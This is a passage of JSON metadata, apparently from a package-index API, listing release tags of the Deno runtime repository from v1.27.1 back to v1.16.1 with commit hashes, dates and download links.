_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.1/manifests"},{"name":"v1.27.0","sha":"b0fb8fa9dc08640e77eb0ab888a483db18a52a4b","kind":"commit","published_at":"2022-10-27T15:13:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.27.0/manifests"},{"name":"v1.26.2","sha":"d1f432bf12e5de645d45f1f2738a53981f39fa5b","kind":"commit","published_at":"2022-10-17T18:51:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.2/manifests"},{"name":"v1.26.1","sha":"753b60dd9b0c9bb5220609f2fe65ad06957690d6","kind":"commit","published_at":"2022-10-06T17:16:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.1/manifests"},{"name":"v1.26.0","sha":"d8827514ffef04c2e1732f7033ff6a374dd94d54","kind":"commit","published_at":"2022-09-28T22:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.26.0/manifests"},{"name":"v1.25.4","sha":"02afbe2af550ad5223d982e8fdd37f778b9d828c","kind":"commit","published_at":"2022-09-22T18:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.4/manifests"},{"name":"v1.25.3","sha":"f561e765a75c749f1d1e2d6584edf6018435e6e1","kind":"commit","published_at":"2022-09-15T17:46:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.3/manifests"},{"name":"v1.25.2","sha":"3c5af2ba495b2d5770b3f5ed12e202ba2089ebda","kind":"commit","published_at":"2022-09-09T08:54:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.2/manifests"},{"name":"v1.25.1","sha":"1e78804d5c0b8204978dd77431ac33d8d16ce5bc","kind":"commit","published_at":"2022-09-02T00:07:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.1/manifests"},{"name":"v1.25.0","sha":"8986e2ced4adbf6185aea02a580036aa92c2872c","kind":"commit","published_at":"2022-08-24T22:20:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.25.0/manifests"},{"name":"v1.24.3","sha":"c79127061438234a60f63cf9d0a276328961f971","kind":"commit","published_at":"2022-08-11T18:38:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.3/manifests"},{"name":"v1.24.2","sha":"44ade24fb213875814c431c87abb3f79ecab1fef","kind":"commit","published_at":"2022-08-04T20:49:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.2/manifests"},{"name":"v1.24.1","sha":"fa9698fe9ec3ceb660c1865eb75f07a0bc5b90c5","kind":"commit","published_at":"2022-07-28T17:22:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.1/manifests"},{"name":"v1.24.0","sha":"f0e01682cce638303e3b6997788667a0f71dff8d","kind":"commit","published_at":"2022-07-20T23:28:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.24.0/manifests"},{"name":"v1.23.4","sha":"b0de3031dcfe6eab1156a2546b996005d1c07cfe","kind":"commit","published_at":"2022-07-12T18:55:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.4/manifests"},{"name":"v1.23.3","sha":"0b07d1a40318147ec0782af9fe99048d5ef80984","kind":"commit","published_at":"2022-07-05T17:00:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.3/manifests"},{"name":"v1.23.2","sha":"5a5d3084ab0f20c511a70a1f2e12ef7bdd184ec2","kind":"commit","published_at":"2022-06-30T19:31:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.2/manifests"},{"name":"v1.23.1","sha":"9f9941c03b942469fb651477503f8cd19f18a1ab","kind":"commit","published_at":"2022-06-23T19:50:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.1/manifests"},{"name":"v1.23.0","sha":"e7ea4edc8a1a4fc339ac2267d9512a9374bc2ce5","kind":"commit","published_at":"2022-06-15T23:02:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.23.0/manifests"},{"name":"v1.22.3","sha":"43e7c5d328a5a17a8c33362caf642d6ded49f179","kind":"commit","published_at":"2022-06-09T18:55:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.3/manifests"},{"name":"v1.22.2","sha":"783f7661ef74a56dcc8a3a382adc8cf559ec75e5","kind":"commit","published_at":"2022-06-02T17:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.2/manifests"},{"name":"v1.22.1","sha":"6a7151539737e4abe1b12095c9e1bc3ed9376f48","kind":"commit","published_at":"2022-05-27T04:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.1/manifests"},{"name":"v1.22.0","sha":"5ad8919d642b646caa3328930dd1a3f290bc587e","kind":"commit","published_at":"2022-05-18T15:05:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.22.0/manifests"},{"name":"v1.21.3","sha":"d14b77b58e3598ea28712473ea832e22070940ca","kind":"commit","published_at":"2022-05-12T14:14:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.3/manifests"},{"name":"v1.21.2","sha":"2256c697aedc2d2d2d856a4faa0816521a02692a","kind":"commit","published_at":"2022-05-05T20:56:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%